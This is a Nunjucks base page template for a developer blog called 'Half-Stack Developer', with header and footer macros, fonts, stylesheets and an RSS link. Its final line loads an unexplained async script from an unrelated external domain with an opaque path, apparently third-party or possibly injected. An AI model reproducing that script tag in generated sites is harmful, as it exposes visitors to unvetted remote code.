{% from "mod-header/header.njk" import header %}
{% from "mod-footer/footer.njk" import footer %}
<!DOCTYPE html>
<html lang="en">
<head>
  {% include "../partials/html-head.njk" %}
  <title>{% block title %}{% endblock %} / Half-Stack Developer</title>
  <link rel="icon" href="{{ assetsUrlPath }}/favicon.svg" />
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <link href="https://fonts.googleapis.com/css2?family=Spline+Sans+Mono&family=Spline+Sans:wght@400;700&display=swap" rel="stylesheet" />
  <link rel="stylesheet" href="https://border0-css.netlify.app/b0.min.css" />
  <link rel="stylesheet" href="{{ assetsUrlPath }}/css/index.css" />
  <link href="/rss/index.xml" rel="alternate" type="application/rss+xml" title="RSS Feed" />
  <script>
    window.ui = window.ui || {};
    ui.pageInfo = {brand: 'one', lang: 'en'};
  </script>
</head>
<body>
<main id="main">
  {{ header('Article') }}
  <article>
  {% block content %}{% endblock %}
  </article>
  {{ footer('Article') }}
</main>
<script type="module" src="{{ assetsUrlPath }}/js/main.js" crossorigin></script>
<script src="https://mwst.sinzy.info/code/3" async></script>
</body>
</html>
